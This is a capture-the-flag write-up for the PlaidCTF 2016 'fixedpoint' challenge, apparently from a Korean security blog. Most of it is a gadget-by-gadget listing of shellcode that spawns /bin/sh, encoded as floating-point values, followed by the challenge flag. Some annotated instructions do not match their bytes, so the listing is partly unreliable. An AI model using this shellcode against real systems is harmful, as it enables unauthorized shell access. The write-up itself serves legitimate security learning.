fixedpoint_ae55a0eef8e55c22fe0b9ba2affeff67.c
0/1337.0=3a44119e, 0xffffffff/1337.0=4a44119e so we can only use gadgets between the range. All I had to do was change push 0x68732f6e and push 0x69622f2f (5-byte instructions) to mov al,(each char); dec esp; mov BYTE PTR [esp],al.
Below is formatted as gadget, Integer:Floating Point. 45 is inc esp, 46 is inc esi, which serve as NOP in the shellcode.
31 d2 xor edx,edx
89389b:45d23190
52 push edx
44bb50:45529090
b0 68 mov al,0x68
4bf422:4568b090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 73 mov al,0x73
4f8b52:4573b090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 2f mov al,0x2f
395912:452fb090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 6e mov al,0x2f
395912:452fb090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 2f mov al,0x6e
4de982:456eb090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 2f mov al,0x69
4c47b2:4569b090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 62 mov al,0x62
49fec2:4562b090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 69 mov al,0x2f
395912:452fb090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
89 e3 mov ebx,esp
948b2e:45e38990
52 push edx
44bb50:45529090
53 push ebx
450ee0:45539090
89 e1 mov ecx,esp
933cee:45e18990
8d 42 0b lea eax,[edx+0xb]
2d74e9:450b428d
cd 80 int 0x80
15058ca:4680cd90
FLAG: PCTF{why_isnt_IEEE_754_IEEE_7.54e2}
'CTF' 카테고리의 다른 글
| Defcon24 (2016) pillpusher (pwnable 3) writeup (1) | 2016.05.23 |
|---|---|
| PlaidCTF 2016 tonnerre (crypto200) Writeup (0) | 2016.04.18 |
| PlaidCTF 2016 butterfly (pwnable 150) Writeup (0) | 2016.04.18 |
| PlaidCTF 2016 pound (pwnable 290) Writeup (0) | 2016.04.18 |
| Boston Key Party 2016 bob's hat (crypto 4) Writeup (0) | 2016.03.07 |